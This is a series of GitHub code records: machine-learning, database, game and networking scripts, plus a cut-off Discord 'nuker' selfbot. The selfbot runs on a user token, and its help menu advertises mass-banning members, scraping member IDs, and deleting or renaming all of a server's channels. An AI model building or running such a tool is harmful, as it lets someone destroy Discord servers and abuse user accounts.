ActivatedFeatures)\n ImageOutput = nn.functional.interpolate(ImageOutput, scale_factor=2, mode='bilinear', align_corners=False, antialias=False) + Aggregate(ActivatedFeatures)\n \n return ImageOutput\n\nclass Discriminator(nn.Module):\n def __init__(self, BasisSize=4, LatentDimension=512, EpilogWidth=1024, StageWidths=[128, 256, 256, 256, 512, 512, 512, 1024], BlocksPerStage=[2, 2, 2, 2, 2, 2, 2, 2], CompressionFactor=4, ReceptiveField=3):\n super(Discriminator, self).__init__()\n \n self.FromRGB = MSRInitializer(nn.Conv2d(3, StageWidths[0], kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n \n MainLayers = []\n ExtendedStageWidths = StageWidths + [EpilogWidth]\n for x in range(len(StageWidths)):\n MainLayers += [DiscriminatorStage(ExtendedStageWidths[x], ExtendedStageWidths[x + 1], BlocksPerStage[x], CompressionFactor, ReceptiveField)]\n self.MainLayers = nn.ModuleList(MainLayers)\n \n self.EpilogLayer = DiscriminatorEpilogLayer(EpilogWidth, BasisSize, LatentDimension)\n self.CriticLayer = MSRInitializer(nn.Linear(LatentDimension, 1))\n \n def forward(self, x):\n x = self.FromRGB(x)\n\n for Layer in self.MainLayers:\n x = Layer(x)\n \n x = self.EpilogLayer(x)\n return self.CriticLayer(x).view(x.shape[0])\n\n\n\n\n\n\n\n\n\n#### quick test ####\n# Network2x = Generator(FeatureWidths=[512, 256])\n# Network4x = Generator()\n\n# D = Discriminator(BasisSize=3, StageWidths=[256, 256, 512, 512, 512, 1024], BlocksPerStage=[1, 1, 2, 2, 2, 1])\n\n# print('G params: ' + str(sum(p.numel() for p in Network4x.parameters() if p.requires_grad)))\n# print('D params: ' + str(sum(p.numel() for p in D.parameters() if p.requires_grad)))\n\n# x = torch.rand((4, 3, 48, 48))\n# y = Network4x(x)\n# c = D(y)\n# print(y.shape)\n# print(c.shape)","repo_name":"dustin-wu/Super-Rez","sub_path":"src/model/NetworksV2.py","file_name":"NetworksV2.py","file_ext":"py","file_size_in_byte":15343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19842964605","text":"\"\"\"empty message\n\nRevision ID: ed8b788fd93d\nRevises: eef2a11c8bde\nCreate Date: 2020-11-22 14:04:04.566132\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ed8b788fd93d'\ndown_revision = 'eef2a11c8bde'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('venue_genre',\n sa.Column('venue_id', sa.Integer(), nullable=False),\n sa.Column('genre_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['genre_id'], ['Artist.id'], ),\n sa.ForeignKeyConstraint(['venue_id'], ['Venue.id'], ),\n sa.PrimaryKeyConstraint('venue_id', 'genre_id')\n )\n op.drop_constraint('Artist_genre_id_fkey', 'Artist', type_='foreignkey')\n op.drop_column('Artist', 'genre_id')\n op.alter_column('Genre', 'name',\n existing_type=sa.VARCHAR(),\n nullable=True)\n op.drop_constraint('Venue_genre_id_fkey', 'Venue', type_='foreignkey')\n op.drop_column('Venue', 'genre_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Venue', sa.Column('genre_id', sa.INTEGER(), autoincrement=False, nullable=False))\n op.create_foreign_key('Venue_genre_id_fkey', 'Venue', 'Genre', ['genre_id'], ['id'])\n op.alter_column('Genre', 'name',\n existing_type=sa.VARCHAR(),\n nullable=False)\n op.add_column('Artist', sa.Column('genre_id', sa.INTEGER(), autoincrement=False, nullable=False))\n op.create_foreign_key('Artist_genre_id_fkey', 'Artist', 'Genre', ['genre_id'], ['id'])\n op.drop_table('venue_genre')\n # ### end Alembic commands ###\n","repo_name":"JosephMugo/fyyur","sub_path":"migrations/versions/ed8b788fd93d_.py","file_name":"ed8b788fd93d_.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"9862072086","text":"\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nfrom fake_useragent import UserAgent\n\nua = UserAgent()\nheader = {'User-Agent': str(ua.random)}\n\npairs = ['JPY', 'USD', 'EUR', 'GBP', 'CAD', 'AUD']\ninvesting_data = []\nfor pair in pairs:\n BASE_URL = 'https://kr.investing.com/currencies/{}-{}'.format(pair.lower(), 'krw')\n url = Request(BASE_URL, headers=header)\n html = urlopen(url)\n\n if html.status == 200:\n print('인베스팅')\n soup = BeautifulSoup(html, 'html.parser')\n element = soup.find('span', {'data-test': 'instrument-price-last'})\n if pair == 'JPY':\n investing_data.append(round(float(element.text.replace(',', '')) * 100, 2))\n print(investing_data)\n else:\n investing_data.append(round(float(element.text.replace(',', '')), 2))\n print(investing_data)\n else:\n req_flag = 1\n # bot.send_message(chat_id=CHK_CHAT_ID, text=str(html.status) + ' 인베스팅 크롤링 실패...')\n\n\n","repo_name":"electricalboy1991/Dollar_future","sub_path":"230816_Investing_exchange_rate.py","file_name":"230816_Investing_exchange_rate.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25723850844","text":"import pymongo\r\nfrom pymongo.server_api import ServerApi\r\n\r\nclient = pymongo.MongoClient(\"mongodb+srv://insira-seu-usuario:insira-a-senha@cluster0.tjdbym4.mongodb.net/?retryWrites=true&w=majority\", server_api=ServerApi('1'))\r\ndb = client.test\r\n\r\nnome_db = 'db_youtube1'\r\ndb[nome_db].drop()\r\n\r\nprint(f'\\nREMOÇAO DO BANCO DE DADOS \"{nome_db}\" REALIZADO COM SUCESSO\\n')\r\n\r\n\r\nnome_db = 'db_youtube2'\r\ndb[nome_db].drop()\r\n\r\nprint(f'\\nREMOÇAO DO BANCO DE DADOS \"{nome_db}\" REALIZADO COM SUCESSO\\n')","repo_name":"carlosfalcone/ConsumindoApiYoutube","sub_path":"Remocao_Youtube3-entrega.py","file_name":"Remocao_Youtube3-entrega.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71593176256","text":"import sacrebleu\n\n# data_dir = 'data'\ndata_dir = 'data-illegal-immigrant-512'\n\ndef compute_bleu(pred_path, ref_path):\n\n with open(pred_path) as f:\n pred = f.readlines()\n\n with open(ref_path) as f:\n ref = f.readlines()\n\n bleu = sacrebleu.corpus_bleu(pred, [ref])\n print(bleu.score)\n\n\nif __name__ == '__main__':\n compute_bleu(pred_path=f'./{data_dir}/predict5.tok.en', ref_path=f'./{data_dir}/test.tok.en')\n","repo_name":"JunW15/AdvMT","sub_path":"defences/dp/opennmt-iwslt/get_bleu.py","file_name":"get_bleu.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16706785229","text":"import sys\nimport os\nimport pygame\nfrom goal import Goal\nfrom player import Player\nimport numpy as np\nimport random\n\nos.environ['SDL_VIDEO_CENTERED'] = '1'\npygame.init()\n\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nGREEN = 94, 230, 130\nRED = 230, 94, 94\nBLUE = 94, 173, 230\nBLOCK_SIZE = 20, 20\nNUM_OBSTACLES = 100\nSCREEN_SIZE = SCREEN_WIDTH, SCREEN_HEIGHT = 300, 300\nfont_size = 36\nmargin = 100\n\nEPISODES = 24000\nSHOW_EVERY = 3000\nMOVE_PENALTY = 1\nGOAL_REWARD = 25\nOUT_OF_BOUNDS_PENALTY = 200\nOBSTACLE_HIT_PENALTY = 300\nEPS_DECAY = 0.9999\nLEARNING_RATE = 0.1\nDISCOUNT = 0.95\nQ_TABLE_SIZE = (SCREEN_WIDTH // BLOCK_SIZE[0] + 2, SCREEN_HEIGHT // BLOCK_SIZE[1] + 2, 4)\nepsilon = 0.5\nq_table = np.zeros(Q_TABLE_SIZE)\n\nscreen = pygame.display.set_mode(SCREEN_SIZE)\nclock = pygame.time.Clock()\nfont = pygame.font.Font(None, font_size)\n\ngoal = Goal(SCREEN_WIDTH, SCREEN_HEIGHT, GREEN)\ngoal_rect = goal.get_rect()\nobstacle_rects = [pygame.Rect((random.randrange(0, SCREEN_WIDTH, BLOCK_SIZE[0]), random.randrange(0, SCREEN_HEIGHT, BLOCK_SIZE[1])), BLOCK_SIZE) for i in range(NUM_OBSTACLES)]\nwhile goal_rect in obstacle_rects:\n goal.change_pos(SCREEN_WIDTH, SCREEN_HEIGHT)\n goal_rect = goal.get_rect()\n\ndef gameInit():\n global player \n global player_rect\n global goal_reached \n global out_of_bounds\n\n player = Player(SCREEN_WIDTH, SCREEN_HEIGHT, WHITE)\n player_rect = player.get_rect()\n goal_reached = False\n out_of_bounds = False\n\n\ndef check_boundaries(head):\n if head.left < 0 or head.right > SCREEN_WIDTH or head.top < 0 or head.bottom > SCREEN_HEIGHT:\n return True\n return False\n\n\ndef setSpeedFromAction(action):\n if action == 0:\n player.set_speed([20, 0]) \n elif action == 1:\n player.set_speed([-20, 0])\n elif action == 2:\n player.set_speed([0, 20])\n elif action == 3:\n player.set_speed([0, -20])\n \n \ndef coordsToState(coords):\n return coords[0] // 20 + 1, coords[1] // 20 + 1\n\n\ndef check_reached_goal(player_rect, goal_rect):\n if player_rect.colliderect(goal_rect):\n return True\n return False\n\n\ndef check_hit_obstacle(player_rect, obstacle_rects):\n if player_rect.collidelist(obstacle_rects):\n return True\n return False\n\n\nfor episode in range(EPISODES):\n if episode % SHOW_EVERY == 0:\n show = True\n else:\n show = False\n\n gameInit()\n\n for i in range(200):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n current_state = coordsToState(player.get_coords())\n \n if np.random.random() > epsilon:\n action = np.argmax(q_table[current_state])\n else:\n action = np.random.randint(0, 4)\n \n setSpeedFromAction(action)\n player.move()\n player_rect = player.get_rect()\n player_coords = player.get_coords()\n out_of_bounds = check_boundaries(player_rect)\n goal_reached = check_reached_goal(player_rect, goal_rect)\n obstacle_hit = check_hit_obstacle(player_rect, obstacle_rects)\n\n if out_of_bounds:\n q_table[current_state + (action,)] = -OUT_OF_BOUNDS_PENALTY\n break\n elif goal_reached:\n reward = GOAL_REWARD\n elif obstacle_hit:\n reward = -OBSTACLE_HIT_PENALTY\n else:\n reward = -MOVE_PENALTY\n \n new_state = coordsToState(player_coords)\n max_future_q = np.max(q_table[new_state])\n current_q = q_table[current_state + (action,)]\n\n if goal_reached:\n new_q = reward\n else:\n new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * (reward + DISCOUNT * max_future_q)\n\n q_table[current_state + (action,)] = new_q\n\n if show:\n screen.fill(BLACK)\n pygame.draw.rect(screen, goal.color, goal_rect)\n pygame.draw.rect(screen, player.color, player_rect)\n for i in range(NUM_OBSTACLES):\n pygame.draw.rect(screen, RED, obstacle_rects[i])\n visited_rects = player.get_visited_rects()\n for i in range(len(visited_rects)):\n pygame.draw.rect(screen, BLUE, visited_rects[i])\n pygame.display.update()\n clock.tick(100)\n \n if reward == GOAL_REWARD:\n break\n\n # print(f'Episode: {episode} Epsilon: {epsilon}')\n\n epsilon *= EPS_DECAY\n","repo_name":"njr3/Q_learning_pathfinder","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72403189694","text":"from threading import Thread\nimport socket\nimport time\nfrom datetime import datetime\n\nREQUEST = \"1\"\nGRANT = \"2\"\nRELEASE = \"3\"\n\nserver = (\"127.0.0.1\", 8080)\nbuffer_size = 1024\n\nUDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\ndef process(prcss, content, k, r):\n for ri in range(r):\n UDPClientSocket.sendto(str.encode(f\"{REQUEST}|{prcss}|{content}\"), server)\n loop_rcv = True\n while loop_rcv:\n rcv = UDPClientSocket.recvfrom(buffer_size)\n message = rcv[0].decode()\n address = rcv[1]\n message = message.split(\"|\")\n msg = message[0]\n prcss_rcv = message[1]\n if (msg == GRANT) and (prcss_rcv == prcss):\n with open('resultado.txt', 'a') as f:\n f.write(f\"{prcss} | {datetime.now().strftime('%H:%M:%S.%f')}\\n\")\n UDPClientSocket.sendto(str.encode(f\"{RELEASE}|{prcss}|{content}\"), server)\n loop_rcv = False\n time.sleep(k)\n\nif __name__ == \"__main__\":\n n = int(input(\"n: \"))\n r = int(input(\"r: \"))\n k = int(input(\"k: \"))\n\n for ni in range(n):\n Thread(target=process, args=(str(ni), \"00000\", k, r)).start()","repo_name":"ChristianNMoreira/SD-TP3","sub_path":"processes.py","file_name":"processes.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28787529431","text":"from factory import Factory\nfrom factory.fuzzy import FuzzyText, FuzzyInteger, FuzzyFloat\nimport pytest\nfrom pytest import fixture\n\nfrom IO_LOTTERY.domain import User\n\n\nclass UserFactory(Factory):\n class Meta:\n model = User\n\n first_name = FuzzyText()\n last_name = FuzzyText()\n email = FuzzyText()\n age = FuzzyInteger(low=0)\n essays_count = FuzzyInteger(low=0)\n rating = FuzzyFloat(low=0)\n\n\n@pytest.fixture\ndef user() -> User:\n return UserFactory()\n\n\ndef test_can_instantiate_user(user: User) -> None:\n assert isinstance(user, User)\n\n\ndef test_user_has_first_name_as_attribute(user: User) -> None:\n assert hasattr(user, 'first_name')\n assert isinstance(user.first_name, str)\n assert user.first_name\n","repo_name":"NiceoNN/IO_LOTTERY_","sub_path":"IO_LOTTERY/tests/unit/test_domain.py","file_name":"test_domain.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23723520949","text":"\nclass UpdateCourseName(Mutation):\n class Arguments:\n id = ID(required=True)\n name = String()\n courseCode = Int()\n\n courseName = Field(CourseNameType)\n message = String()\n def mutate(root, info, id, name=None, courseCode=None):\n oldCourseName = get_object_or_None(CourseName, pk=id)\n if oldCourseName:\n if name:\n oldCourseName.name = name\n if courseCode:\n oldCourseName.code = courseCode\n oldCourseName.save()\n return UpdateCourseName(courseName=oldCourseName)\n return UpdateCourseName(message=\"Failed - Object Not found\")\n\n\n\nclass UpdateCourse(Mutation):\n class Arguments:\n id = ID(required=True)\n courseName = ID()\n program = ID()\n\n course = Field(CourseType)\n message = String()\n def mutate(root, info, id, courseName=None, program=None):\n oldCourse = get_object_or_None(Course, pk=id)\n if oldCourse:\n if courseName:\n courseNameObject = get_object_or_None(CourseName, pk=courseName)\n if courseNameObject:\n oldCourse.course = courseNameObject\n if program:\n programObject = get_object_or_None(Program, pk=program)\n if programObject:\n oldCourse.program = programObject\n oldCourse.save()\n return UpdateCourse(course=oldCourse)\n return UpdateCourse(message=\"Failed - Object Not found\")\n\n","repo_name":"NobinKhan/UMSDB","sub_path":"academic/mutation/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"11858154386","text":"# Definition for a binary tree node\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nfrom queue import Queue\r\nclass Solution:\r\n # @param A : root node of tree\r\n # @return an integer\r\n def coveredNodes(self, A):\r\n cover = 0\r\n uncover = 0\r\n q = Queue()\r\n q.put(A)\r\n level = 0\r\n while (q.empty()==False):\r\n n = q.qsize()\r\n for i in range(n):\r\n node = q.get()\r\n if (i == 0 or i == n - 1):\r\n uncover += node.val\r\n else:\r\n cover += node.val\r\n if (node.left != None):\r\n q.put(node.left)\r\n if (node.right != None):\r\n q.put(node.right)\r\n return abs(cover - uncover)\r\n","repo_name":"PrinceSinghhub/InterviewBit-Tree-Data-Structure","sub_path":"Interview Bit BST/Covered Uncovered Nodes.py","file_name":"Covered Uncovered Nodes.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"71295583931","text":"# download packages\n#!pip install transformers==4.8.2\n\n# import packages\nimport os\nimport re\nimport torch\nimport random\nimport pandas as pd\nfrom kaggle.api.kaggle_api_extended import KaggleApi\n\n\nfrom tqdm import tqdm\nfrom torch.utils.data import Dataset\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import train_test_split\nfrom transformers import GPT2Tokenizer, TrainingArguments, Trainer, GPT2LMHeadModel\n\n# Define class and functions\n# --------\n\n# Dataset class\n\n\nclass ArxivDataset(Dataset):\n def __init__(self, df, tokenizer, max_length):\n # define variables\n print(\"encoding data with tokenizer\")\n self.input_ids = []\n self.attn_masks = []\n self.labels = []\n # iterate through the dataset\n prep_txt = df.apply(\n lambda x: f'<|startoftext|> Categorie: {x.categories} \\nAbstract: {x.abstract}\\nTitle: {x.title}<|endoftext|>', axis=1)\n # tokenize,axis=1)\n for txt in prep_txt:\n # tokenize\n encodings_dict = tokenizer(txt, truncation=True,\n max_length=max_length, padding=\"max_length\")\n # append to list\n self.input_ids.append(torch.tensor(encodings_dict['input_ids']))\n self.attn_masks.append(torch.tensor(\n encodings_dict['attention_mask']))\n self.labels.append(txt.split(\"Title:\")[1].split(\"<\")[0])\n\n def __len__(self):\n return len(self.input_ids)\n\n def __getitem__(self, idx):\n return self.input_ids[idx], self.attn_masks[idx], self.labels[idx]\n\n# Data load functions\n\n\ndef download_arxiv_dataset():\n \"\"\"\n Acces Kaggle API to download arxiv dataset\n \"\"\"\n api = KaggleApi()\n # authenticate your Kaggle account to use the api\n api.authenticate()\n # downloading from www.kaggle.com/datasets/Cornell-University/arxiv\n api.competition_download_file(dataset='Cornell-University/arxiv',\n file_name='arxiv-metadata-oai-snapshot.json',\n path='./data/')\n\n\ndef process_arxiv_dataset():\n \"\"\"\n Select relevant field from full arxiv dataset to create condensed dataset.\n\n Since the arxiv dataset is 3.5 GB, and we only need a few fields,\n we process the dataset into a smaller set with only the relevant data. \n \"\"\"\n pass\n\n\ndef load_arxiv_dataset(tokenizer, samples=170000):\n # load dataset and sample 10k reviews.\n if not os.path.exists(\"arxiv_metadata_small.csv\"):\n download_arxiv_dataset()\n process_arxiv_dataset()\n print(\"Loading data\")\n file_path = \"arxiv_metadata_small.csv\"\n df = pd.read_csv(file_path)\n df = df.sample(samples) # 350000, random_state=1)\n\n # divide into test and train\n X_train, X_test = \\\n train_test_split(df, shuffle=True, test_size=20,\n random_state=1) # , stratify=df['categories'])\n\n # format into SentimentDataset class\n train_dataset = ArxivDataset(X_train, tokenizer, max_length=1024)\n\n # return\n return train_dataset, X_test\n\n# Load model and data\n# --------\n\n\nsave_name = \"/home/alex/DeepLearning/sentiment_transformer/results/arxiv-model-medium-20220308\"\noverride = 0\nif os.path.exists(save_name) and override == False:\n model_name = save_name\n model = GPT2LMHeadModel .from_pretrained(model_name).cuda()\n tokenizer = GPT2Tokenizer.from_pretrained('gpt2-medium', bos_token='<|startoftext|>',\n eos_token='<|endoftext|>', pad_token='<|pad|>')\n train_dataset, test_dataset = load_arxiv_dataset(tokenizer, samples=30)\n\nelse:\n # set model name\n model_name = \"gpt2-medium\"\n # seed\n torch.manual_seed(42)\n\n # load tokenizer and model\n tokenizer = GPT2Tokenizer.from_pretrained(model_name, bos_token='<|startoftext|>',\n eos_token='<|endoftext|>', pad_token='<|pad|>')\n model = GPT2LMHeadModel.from_pretrained(model_name).cuda()\n model.resize_token_embeddings(len(tokenizer))\n\n # prepare and load dataset\n train_dataset, test_dataset = load_arxiv_dataset(tokenizer)\n\n # Train\n # --------\n # creating training arguments\n training_args = TrainingArguments(output_dir='results', num_train_epochs=1, logging_steps=10,\n load_best_model_at_end=False, save_strategy=\"steps\", save_steps=55000, do_eval=False, evaluation_strategy=\"no\",\n per_device_train_batch_size=1, gradient_accumulation_steps=8,\n warmup_steps=100, weight_decay=0.001, logging_dir='logs')\n\n # start training\n print(\"Train model\")\n Trainer(model=model, args=training_args, train_dataset=train_dataset,\n data_collator=lambda data: {'input_ids': torch.stack([f[0] for f in data]),\n 'attention_mask': torch.stack([f[1] for f in data]),\n 'labels': torch.stack([f[0] for f in data])}).train()\n\n model.save_pretrained(save_name)\n# Test\n# set the model to eval mode\n_ = model.eval()\n\n# run model inference on all test data\noriginal_label, predicted_label, original_text, predicted_text = [], [], [], []\ntitles = test_dataset.title\ntest_txt = test_dataset.apply(\n lambda x: f'<|startoftext|> Categorie: {x.categories} \\nAbstract: {x.abstract}\\nTitle: ', axis=1)\n\nfor (txt, title) in zip(test_txt, titles):\n # generate tokens\n generated = tokenizer(f\"{txt}\", return_tensors=\"pt\").input_ids.cuda()\n # perform prediction\n MLE_output = model.generate(generated, max_length=1024,\n num_return_sequences=1, early_stopping=True, num_beams=30)\n random_outputs = model.generate(generated, max_length=1024, do_sample=True, top_p=0.9,\n temperature=1.5, num_return_sequences=4, early_stopping=True)\n # decode the predicted tokens into texts\n pred_texts_mle = [tokenizer.decode(\n decoded, skip_special_tokens=True) for decoded in MLE_output]\n pred_texts_random = [tokenizer.decode(\n decoded, skip_special_tokens=True) for decoded in random_outputs]\n # extract the predicted sentiment\n print(\"\\n\\n----------REAL----------\\n\", txt+title,\n \"\\n--------------Generated------------------\\n\")\n for pred in pred_texts_mle:\n print(\"\\nGenerated MLE Title:\", pred.split(\"\\nTitle:\")[1], \"\\n\")\n for pred in pred_texts_random:\n print(\"\\nGenerated random Title:\", pred.split(\"\\nTitle:\")[1], \"\\n\")\n","repo_name":"avvorstenbosch/Paper_Title_Recommender","sub_path":"arxiv.py","file_name":"arxiv.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21738728699","text":"\"\"\"\nDemonstration of transitions between scenes.\n\"\"\"\n\nimport cocos\nfrom cocos.director import director\nfrom cocos.scene import Scene\nfrom cocos.sprite import Sprite\nfrom cocos.layer import ColorLayer, Layer\nfrom cocos.scenes.transitions import *\n\nimport pyglet\nfrom pyglet.window import key\nfrom lib.listmenu import ListMenu\n\npyglet.resource.path = ['../animals']\npyglet.resource.reindex()\n\ntransitions = [\n 'RotoZoomTransition',\n 'JumpZoomTransition',\n 'SplitColsTransition',\n 'SplitRowsTransition',\n 'MoveInLTransition',\n 'MoveInRTransition',\n 'MoveInBTransition',\n 'MoveInTTransition',\n 'SlideInLTransition',\n 'SlideInRTransition',\n 'SlideInBTransition',\n 'SlideInTTransition',\n 'FlipX3DTransition',\n 'FlipY3DTransition',\n 'FlipAngular3DTransition',\n 'ShuffleTransition',\n 'ShrinkGrowTransition',\n 'CornerMoveTransition',\n 'EnvelopeTransition',\n 'FadeTRTransition',\n 'FadeBLTransition',\n 'FadeUpTransition',\n 'FadeDownTransition',\n 'TurnOffTilesTransition',\n 'FadeTransition',\n 'ZoomTransition',\n]\n\nclass Transitions(ListMenu):\n def __init__(self, *args, **kwargs):\n super(Transitions, self).__init__(transitions, wrap=True, *args, *kwargs)\n w, h = director.get_window_size()\n\n # Define three different sprites\n s0 = Sprite('cow-icon.png', position=(w//2, h//2), scale=2)\n s1 = Sprite('bird-icon.png', position=(w//2, h//2), scale=2)\n s2 = Sprite('parrot-icon.png', position=(w//2, h//2), scale=2)\n\n # Define three different scenes\n scene0 = Scene(ColorLayer(100, 0, 0, 255), s0, self)\n scene1 = Scene(ColorLayer(0, 100, 0, 255), s1, self)\n scene2 = Scene(ColorLayer(0, 0, 100, 255), s2, self)\n \n self.scenes = [scene0, scene1, scene2]\n self.scene_index = 0\n \n def cb(self):\n if self.k == key.ENTER:\n self.scene_index += 1\n self.scene_index %= len(self.scenes)\n scene = self.scenes[self.scene_index]\n transition = eval(self.item)\n director.replace(transition(scene, 1))\n\nif __name__ == '__main__':\n director.init(caption='Transitions', resizable=True)\n director.run(Transitions().scenes[0])\n","repo_name":"rasql/cocos2d-tutorial","sub_path":"examples/transitions.py","file_name":"transitions.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25758360599","text":"# https://leetcode.com/problems/equal-row-and-column-pairs/\n\n# Time complexity O(n*n). Space complexity O(n).\nclass Solution:\n def equalPairs(self, grid: List[List[int]]) -> int:\n rows = defaultdict(int)\n result = 0\n for r in range(len(grid)):\n rows[tuple(grid[r])] += 1\n for c in range(len(grid[0])):\n col = []\n for r in range(len(grid)):\n col.append(grid[r][c])\n col = tuple(col)\n if col in rows:\n result += rows[col]\n return result\n","repo_name":"ioann7/problem_solving_on_leetcode","sub_path":"2023_June_daily_challenges/2352. Equal Row and Column Pairs.py","file_name":"2352. Equal Row and Column Pairs.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30081085821","text":"import os\r\nimport discord\r\nfrom discord.ext import commands\r\nimport asyncio \r\nimport random \r\nimport requests\r\nimport sys\r\nimport threading\r\nimport datetime\r\nimport json\r\nimport aiohttp\r\nimport io\r\nfrom colored import fg\r\np = fg('#5620db')\r\nm = fg('#7d5ad4')\r\nfrom colorama import Fore\r\nimport time\r\nimport urllib\r\n \r\nos.system('pip install -r requirements.txt')\r\nos.system('cls' if os.name == 'nt' else 'clear') \r\n\r\ntoken = \"\"\r\nprefix = \">\"\r\nintents = discord.Intents.all()\r\nintents.members = True \r\nprint(f\"\"\"\r\n{p}▄▄▄▄▄ ▄ •▄ ▄· ▄▌ \r\n{m}•██ ▪ █▌▄▌▪▐█▪██▌▪ \r\n{p} ▐█.▪ ▄█▀▄ ▐▀▀▄·▐█▌▐█▪ ▄█▀▄ \r\n{m} ▐█▌·▐█▌.▐▌▐█.█▌ ▐█▀·.▐█▌.▐▌\r\n{p} ▀▀▀ ▀█▄▀▪·▀ ▀ ▀ • ▀█▄▀▪\r\n\r\n- https://github.com/s3ng0n\r\n- S3ng0nDev\r\n- Prefix : {prefix}\"\"\")\r\n\r\n\r\ndef check_token():\r\n if requests.get(\"https://discord.com/api/v8/users/@me\", headers={\"Authorization\": f'{token}'}).status_code == 200:\r\n return \"user\"\r\n else:\r\n return \"bot\"\r\n\r\ntoken_type = check_token()\r\nintents = discord.Intents.all()\r\nintents.members = True\r\n\r\nif token_type == \"user\":\r\n headers = {'Authorization': f'{token}'}\r\n tokyo = commands.Bot(command_prefix=\">\", case_insensitive=False, self_bot=True, intents=intents)\r\nelif token_type == \"bot\":\r\n headers = {'Authorization': f'Bot {token}'}\r\n tokyo = commands.Bot(command_prefix=\">\", case_insensitive=False, intents=intents)\r\n\r\ntokyo.remove_command(name=\"help\") \r\n\r\n@tokyo.event\r\nasync def on_ready():\r\n print(f\"- Logged in as {tokyo.user}\")\r\n\r\n\r\n\r\n@tokyo.command()\r\nasync def nuking(ctx):\r\n await ctx.message.delete()\r\n await ctx.send(f\"\"\"\r\n```ansi\r\n\u001B[2;34m- >massban\r\n\u001B[2;37m- Massbans user from server\r\n\u001B[2;34m\u001B[2;37m\u001B[2;34m- >scrape\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m\u001B[2;37m- Scrapes member ID available in discord server\u001B[0m\u001B[2;37m\r\n\u001B[2;34m- >dc\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Delete channels from server\r\n\u001B[0m\u001B[2;34m\u001B[2;37m\u001B[2;34m- >rc\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Rename all the channels available\u001B[0m\r\n\r\n\u001B[2;34mComing Soon...\u001B[0m\u001B[2;31m\u001B[0m\r\n```\r\n\"\"\")\r\n\r\n@tokyo.command()\r\nasync def help(ctx):\r\n await ctx.message.delete()\r\n await ctx.send(f\"\"\"\r\n```ansi\r\n\u001B[2;34m ╔╦╗╔═╗╦╔═╦ ╦╔═╗\r\n ║ ║ ║╠╩╗╚╦╝║ ║\r\n ╩ ╚═╝╩ ╩ ╩ ╚═╝\r\n- https://github.com/s3ng0n\r\n------------------------------\r\n[+] Nuking\r\n[+] Fun\r\n[+] Utils\r\n------------------------------\r\n\u001B[0m\r\n```\r\n\"\"\")\r\n@tokyo.command()\r\nasync def fun(ctx):\r\n await ctx.message.delete()\r\n await ctx.send(f\"\"\"\r\n```ansi\r\n\u001B[2;34m- >hack @user\r\n\u001B[2;37m- Does 1337 \"Hacking\" against user\r\n\u001B[2;34m- >cum\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Fun little command that makes you cum\u001B[0m\r\n\u001B[2;34m\u001B[2;37m\u001B[2;34m- >911\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Fun little command that makes you boom boom\r\n\u001B[0m\u001B[2;34m\u001B[2;37m\u001B[2;34m- >magik\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Makes your pfp shit\r\n\u001B[0m\r\n\u001B[2;34mComing 